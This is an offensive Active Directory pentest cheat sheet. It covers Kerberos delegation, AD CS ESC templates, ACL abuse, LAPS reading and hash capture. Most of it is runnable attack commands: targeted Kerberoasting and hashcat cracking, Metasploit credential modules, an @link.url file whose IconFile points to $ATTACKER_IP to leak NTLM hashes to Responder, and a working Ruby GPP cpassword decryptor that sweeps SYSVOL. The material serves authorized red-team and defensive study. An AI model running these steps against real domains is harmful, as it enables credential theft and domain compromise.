
Vulnerability Discovery

Find exploitable misconfigurations in AD: Kerberos delegation, certificate authority vulnerabilities (ESC1–ESC8), ACL abuses, LAPS exposure and hash capture opportunities.


7.1 Kerberos Delegation

nxc / BloodHound
Find delegation configs via NXC
nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD --find-delegation
BloodHound — search for delegation
# Search for: AllowedToDelegate, Unconstrained, ConstrainedDelegation
Delegation types
# Unconstrained Delegation — the service caches the TGT of every user who authenticates to it and can reuse it anywhere → most dangerous
# Constrained Delegation   — the service can only delegate to the SPNs listed in its msDS-AllowedToDelegateTo
# RBCD (Resource-Based Constrained) — the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity decides who may delegate to it
Find computers with unconstrained delegation (DCs always have it by design, so ignore them in the results)
nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD --trusted-for-delegation
Get-NetComputer -Unconstrained                      # PowerView (old function names)
Get-DomainComputer -Unconstrained -Properties DnsHostName  # PowerView (dev branch)
BloodHound Cypher — unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
MATCH (u:User {owned:true}), (c:Computer {unconstraineddelegation:true}), p=shortestPath((u)-[*1..]->(c)) RETURN p
Find constrained delegation (PowerView)
Get-DomainComputer -TrustedToAuth -Properties DnsHostName, msDS-AllowedToDelegateTo
Get-DomainUser -TrustedToAuth
# -TrustedToAuth only matches accounts with protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION);
# constrained delegation without it shows up only through a populated msDS-AllowedToDelegateTo
BloodHound Cypher — constrained delegation (n can be a user or a computer)
MATCH p=(n)-[:AllowedToDelegate]->(t:Computer) RETURN p
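Worked example (added here, not part of the original cheat sheet): the classification above applied to raw LDAP attributes, which is what `--find-delegation` does under the hood. The records are constructed; the userAccountControl bit values are the documented ones. Domain controllers are skipped by default because they are trusted for delegation by design, and a constrained entry is split by whether protocol transition is enabled, since that decides whether you need a Kerberos-authenticated victim or can mint tickets for any user with S4U2Self.

```ruby
# Classify Kerberos delegation from raw LDAP attributes.
# Bit values are the documented userAccountControl flags (MS-SAMR 2.2.1.13).
UAC_SERVER_TRUST_ACCOUNT      = 0x00002000  # set on domain controllers
UAC_TRUSTED_FOR_DELEGATION    = 0x00080000  # unconstrained delegation
UAC_TRUSTED_TO_AUTH_FOR_DELEG = 0x01000000  # constrained delegation with protocol transition

# Constructed sample records, shaped like the attributes an LDAP search returns.
SAMPLE_OBJECTS = [
  { 'sAMAccountName' => 'DC01$',   'userAccountControl' => 0x82000 },   # DC: unconstrained by design
  { 'sAMAccountName' => 'WEB01$',  'userAccountControl' => 0x81000 },   # member server, unconstrained
  { 'sAMAccountName' => 'APP01$',  'userAccountControl' => 0x1001000,   # constrained + protocol transition
    'msDS-AllowedToDelegateTo' => ['cifs/FILE01.corp.local', 'cifs/FILE01'] },
  { 'sAMAccountName' => 'svc_sql', 'userAccountControl' => 0x10200,     # user, constrained, Kerberos only
    'msDS-AllowedToDelegateTo' => ['MSSQLSvc/SQL01.corp.local:1433'] },
  { 'sAMAccountName' => 'FILE01$', 'userAccountControl' => 0x1000,      # RBCD configured on the resource
    'msDS-AllowedToActOnBehalfOfOtherIdentity' => "\x01\x00\x04\x80" }, # raw security descriptor, truncated
  { 'sAMAccountName' => 'WS01$',   'userAccountControl' => 0x1000 }     # nothing to report
].freeze

# One object can carry several findings (e.g. unconstrained plus an RBCD descriptor).
def delegation_findings(obj)
  uac     = obj['userAccountControl'].to_i
  targets = Array(obj['msDS-AllowedToDelegateTo'])
  out     = []
  out << { type: :unconstrained, targets: ['*'] } if (uac & UAC_TRUSTED_FOR_DELEGATION) != 0
  unless targets.empty?
    # With protocol transition the service can obtain tickets for any user via S4U2Self;
    # without it, it can only delegate users who authenticated to it with Kerberos.
    kind = (uac & UAC_TRUSTED_TO_AUTH_FOR_DELEG) != 0 ? :constrained_protocol_transition : :constrained_kerberos_only
    out << { type: kind, targets: targets }
  end
  # The resource's own attribute holds a security descriptor whose DACL lists who may delegate to it.
  out << { type: :rbcd_target, targets: [] } if obj['msDS-AllowedToActOnBehalfOfOtherIdentity']
  out.map { |f| f.merge(account: obj['sAMAccountName']) }
end

def find_delegation(objects, include_dcs: false)
  objects.flat_map do |obj|
    is_dc = (obj['userAccountControl'].to_i & UAC_SERVER_TRUST_ACCOUNT) != 0
    next [] if is_dc && !include_dcs
    delegation_findings(obj)
  end
end

if $PROGRAM_NAME == __FILE__
  find_delegation(SAMPLE_OBJECTS).each do |f|
    puts format('%-8s %-32s %s', f[:account], f[:type], f[:targets].join(', '))
  end
end
```

To run it against a real domain, feed it the attribute dump from an LDAP search (the three attributes used here plus sAMAccountName); the RBCD case only tells you a resource is configured for it, reading who is allowed requires parsing the security descriptor's DACL.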

7.2 Certificates — AD CS (certipy)

certipy / certutil
ESC vulnerability reference
ESC    Description
ESC1   Template lets the enrollee supply a SAN + has a client-auth EKU + low-priv users can enroll
ESC2   Template with Any Purpose EKU or no EKU
ESC3   Certificate Request Agent (enrollment agent) template abuse
ESC4   Write access on a template object (edit it into an ESC1 template)
ESC6   CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (user-supplied SAN on any template)
ESC7   ManageCA / ManageCertificates rights on the CA
ESC8   NTLM relay to the AD CS HTTP web enrollment endpoint
Enumerate — find vulnerable templates (-vulnerable reports only what certipy flags; -stdout prints instead of writing <timestamp>_Certipy.* files)
certipy-ad find -u "$USERNAME@$DOMAIN" -p "$PASSWORD" -dc-ip $TARGET_IP -vulnerable -stdout | tee certipy_output.txt
certipy-ad find -u "$USERNAME@$DOMAIN" -p "$PASSWORD" -dc-ip $TARGET_IP -vulnerable -text   # text report only, no JSON / BloodHound zip
Filter output for ESC findings
grep -iE "vulnerable|esc[0-9]" certipy_output.txt
CERTUTIL (on a Windows host) — dump the templates, then review the file offline
certutil -Template -v > templates.txt
# a PowerShell redirect writes UTF-16LE; convert after copying the file to Linux:
iconv -f UTF-16LE -t UTF-8 templates.txt -o templates_utf8.txt
grep -E "Allow Enroll|Client Authentication|CT_FLAG_ENROLLEE" templates_utf8.txt
ESC1 template criteria (all of these must be true)
# 1. Enrollment rights: 'Allow Enroll' is granted to a group you are in
#    list your groups: net user $USERNAME /domain
# 2. Client authentication: EKU contains 'Client Authentication' (PKINIT Client Authentication, Smart Card Logon, Any Purpose or no EKU also work)
# 3. Enrollee supplies subject: CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT is set, so the request can carry a SAN of your choice
# Also: no manager approval, no authorized signatures required, and the template must be published on an enabled CA
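Worked example (added here, not part of the original page): the ESC1 criteria above turned into a check over template data in the shape of `certipy find -json` output. The field names follow certipy's output as far as I know them and are an assumption; the templates themselves are constructed (four templates, one vulnerable). Instead of a yes/no it returns the conditions a template fails, which is what you need when deciding whether an almost-vulnerable template is worth chaining with ESC4.

```ruby
require 'json'

# Principals whose enrollment rights count as "low-privileged" (assumption: extend per environment).
LOW_PRIV_PRINCIPALS = ['Domain Users', 'Domain Computers', 'Authenticated Users', 'Everyone'].freeze
# EKUs that let the issued certificate authenticate to AD; an empty EKU list also qualifies.
CLIENT_AUTH_EKUS = ['Client Authentication', 'PKINIT Client Authentication',
                    'Smart Card Logon', 'Any Purpose'].freeze

def low_priv_enroll?(rights)
  rights.any? { |r| LOW_PRIV_PRINCIPALS.include?(r.split('\\').last) }
end

def client_auth?(ekus)
  ekus.empty? || ekus.any? { |e| CLIENT_AUTH_EKUS.include?(e) }
end

# Returns the ESC1 conditions a template fails; an empty array means "ESC1 candidate".
def esc1_gaps(t)
  gaps = []
  published = t['Enabled'] && !Array(t['Certificate Authorities']).empty?
  gaps << 'not published on an enabled CA' unless published
  gaps << 'enrollee cannot supply SAN' unless t['Enrollee Supplies Subject']
  gaps << 'no client-auth EKU' unless client_auth?(Array(t['Extended Key Usage']))
  rights = t.dig('Permissions', 'Enrollment Permissions', 'Enrollment Rights') || []
  gaps << 'no low-priv enrollment rights' unless low_priv_enroll?(rights)
  gaps << 'manager approval required' if t['Requires Manager Approval']
  gaps << 'authorized signature required' if t.fetch('Authorized Signatures Required', 0).to_i.positive?
  gaps
end

# template name => list of unmet conditions
def find_esc1(certipy_json)
  JSON.parse(certipy_json).fetch('Certificate Templates').values
      .to_h { |t| [t['Template Name'], esc1_gaps(t)] }
end

# Constructed input in the shape of `certipy find -json` output (field names assumed).
SAMPLE_CERTIPY_JSON = <<~'JSON'
  {
    "Certificate Templates": {
      "0": { "Template Name": "VulnUser", "Enabled": true, "Certificate Authorities": ["corp-DC01-CA"],
             "Enrollee Supplies Subject": true, "Requires Manager Approval": false,
             "Authorized Signatures Required": 0, "Extended Key Usage": ["Client Authentication"],
             "Permissions": { "Enrollment Permissions": { "Enrollment Rights": ["CORP.LOCAL\\Domain Users"] } } },
      "1": { "Template Name": "User", "Enabled": true, "Certificate Authorities": ["corp-DC01-CA"],
             "Enrollee Supplies Subject": false, "Requires Manager Approval": false,
             "Authorized Signatures Required": 0,
             "Extended Key Usage": ["Client Authentication", "Encrypting File System", "Secure Email"],
             "Permissions": { "Enrollment Permissions": { "Enrollment Rights": ["CORP.LOCAL\\Domain Users"] } } },
      "2": { "Template Name": "WebServer", "Enabled": true, "Certificate Authorities": ["corp-DC01-CA"],
             "Enrollee Supplies Subject": true, "Requires Manager Approval": false,
             "Authorized Signatures Required": 0, "Extended Key Usage": ["Server Authentication"],
             "Permissions": { "Enrollment Permissions": { "Enrollment Rights": ["CORP.LOCAL\\Domain Admins"] } } },
      "3": { "Template Name": "Approved", "Enabled": true, "Certificate Authorities": ["corp-DC01-CA"],
             "Enrollee Supplies Subject": true, "Requires Manager Approval": true,
             "Authorized Signatures Required": 0, "Extended Key Usage": ["Client Authentication"],
             "Permissions": { "Enrollment Permissions": { "Enrollment Rights": ["CORP.LOCAL\\Domain Users"] } } }
    }
  }
JSON

if $PROGRAM_NAME == __FILE__
  find_esc1(SAMPLE_CERTIPY_JSON).each do |name, gaps|
    puts gaps.empty? ? "[!] #{name}: ESC1" : "[ ] #{name}: #{gaps.join('; ')}"
  end
end
```

Point the script at the JSON certipy writes (drop `-stdout`, keep the `-json` file) to get the same verdict certipy's own `[!] Vulnerabilities` block gives, plus the reason for every template it does not flag.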

7.3 ACL Misconfigurations

BloodHound / acltoolkit
BloodHound — ACL paths to discover
# Interesting rights: GenericAll, GenericWrite, WriteOwner, WriteDACL, ForceChangePassword, AddMember (on groups), WriteSPN (targeted Kerberoast)
Read ACL entries on an object (Linux)
acltoolkit $DOMAIN/$USERNAME:'<password>'@<target> get-objectacl [-all] -object <object>
Targeted Kerberoasting — needs GenericAll/GenericWrite (or write on servicePrincipalName) over the user: sets an SPN, requests the TGS, then removes the SPN again
targetedKerberoast.py -v -d $DOMAIN -u $USERNAME -p $PASSWORD -o tgs_targeted.txt
hashcat -m 13100 tgs_targeted.txt /usr/share/wordlists/rockyou.txt

7.4 LAPS (Local Administrator Password Solution)

nxc / PowerShell
Read LAPS passwords if you have read rights on ms-Mcs-AdmPwd (legacy LAPS; Windows LAPS stores it in msLAPS-Password)
nxc ldap $DC_IP -d $DOMAIN -u $USERNAME -p $PASSWORD -M laps
Via PowerShell (Get-LAPSPasswords.ps1, NetSPI)
Get-LAPSPasswords -DomainController $DC_IP -Credential $DOMAIN\$USERNAME | Format-Table -AutoSize
BloodHound — who can read LAPS?
MATCH p=(g:Group)-[:ReadLAPSPassword]->(c:Computer) RETURN p
Via Metasploit (on Meterpreter session)
use post/windows/gather/credentials/enum_laps
run

7.5 Capturing Hashes — URL/SCF Attack

Responder
Create an @link.url file (the leading @ sorts it to the top of the share listing, so Explorer renders it first)
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\$ATTACKER_IP\%USERNAME%.icon
IconIndex=1
# Explorer fetches the icon over SMB as soon as someone browses the folder and authenticates to $ATTACKER_IP;
# %USERNAME% is expanded on the victim, so the requested file name tells you who opened the share.
# SCF files use the same IconFile= trick; on current Windows the .url variant is the more reliable choice.
Upload to a writable share and start Responder (the victim must open the folder in Explorer, a CLI listing does not trigger it)
smbclient //$TARGET_IP/share -U "$USERNAME%$PASSWORD"
put @link.url
# exit smb, then:
responder -I eth0 -v
GPP passwords in SYSVOL (MS14-025, May 2014, stopped GPP from writing new cpassword entries; XML files created before the patch stay in SYSVOL)
# Via Metasploit:
use auxiliary/scanner/smb/smb_enum_gpp
set RHOSTS $TARGET_IP
set SMBUser $USERNAME
set SMBPass $PASSWORD
run

# Via smbclient — SYSVOL is readable by any domain user (-N only works with anonymous access enabled); look under
# <domain>\Policies\{GUID}\{Machine,User}\Preferences\ for Groups.xml, Services.xml, ScheduledTasks.xml,
# DataSources.xml, Drives.xml and Printers.xml:
smbclient //$TARGET_IP/SYSVOL -U "$USERNAME%$PASSWORD"
prompt off
recurse on
mget *
grep -r "cpassword" .
gpp-decrypt 'CPASSWORD_VALUE'

# Via NXC:
nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD -M gpp_password
nxc smb $TARGET_IP -u $USERNAME -p $PASSWORD -M gpp_autologin
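Worked example (added here, not from the original page): what gpp-decrypt does, in Ruby with the standard library's OpenSSL binding, plus extraction of the account/cpassword pairs from the XML so a whole SYSVOL dump can be processed in one pass. The AES key is the one Microsoft published in MS-GPPREF; the Groups.xml is constructed except for the cpassword value, which is a widely circulated public sample.

```ruby
require 'openssl'

# AES-256 key Microsoft published in MS-GPPREF (2.2.1.1.4); it is the same in every domain,
# which is why any domain user who can read SYSVOL can recover these passwords.
GPP_AES_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*').freeze

def decrypt_cpassword(cpassword)
  # GPP strips the base64 '=' padding; restore it (gpp-decrypt and strict decoders need it).
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.decrypt
  cipher.key = GPP_AES_KEY
  cipher.iv  = "\x00" * 16                                   # the spec uses an all-zero IV
  plain = cipher.update(padded.unpack1('m')) + cipher.final  # final strips the PKCS#7 padding
  plain.force_encoding('UTF-16LE').encode('UTF-8')           # the password is stored as UTF-16LE
end

# Pull (account, cpassword) pairs out of a GPP XML file. A regex over <Properties .../> tags is used
# instead of an XML parser so this runs on the standard library alone; the attribute names cover
# Groups.xml (userName), Services.xml (accountName), ScheduledTasks.xml (runAs) and DataSources.xml (username).
def extract_gpp_credentials(xml)
  xml.scan(/<Properties\b[^>]*>/).filter_map do |tag|
    cpw = tag[/\bcpassword="([^"]+)"/, 1]
    next unless cpw
    account = tag[/\b(?:userName|accountName|runAs|username)="([^"]*)"/, 1]
    { account: account, cpassword: cpw, password: decrypt_cpassword(cpw) }
  end
end

# Constructed Groups.xml (the second entry has no cpassword and must be skipped). Only the cpassword
# value is real: it is a widely published sample that decrypts to GPPstillStandingStrong2k18.
SAMPLE_GROUPS_XML = <<~'XML'
  <?xml version="1.0" encoding="utf-8"?>
  <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="CORP\svc_backup" image="2" changed="2018-07-18 20:46:06" uid="{0A1B2C3D-0000-4000-8000-000000000001}">
      <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="CORP\svc_backup"/>
    </User>
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="CORP\helpdesk" image="2" uid="{0A1B2C3D-0000-4000-8000-000000000002}">
      <Properties action="U" newName="" fullName="" description="" userName="CORP\helpdesk"/>
    </User>
  </Groups>
XML

if $PROGRAM_NAME == __FILE__
  extract_gpp_credentials(SAMPLE_GROUPS_XML).each { |c| puts "#{c[:account]} : #{c[:password]}" }
end
```

After the `mget *` above, `Dir.glob('**/*.xml').flat_map { |f| extract_gpp_credentials(File.read(f)) }` walks the whole SYSVOL copy; the `grep -r cpassword` step is then only a sanity check.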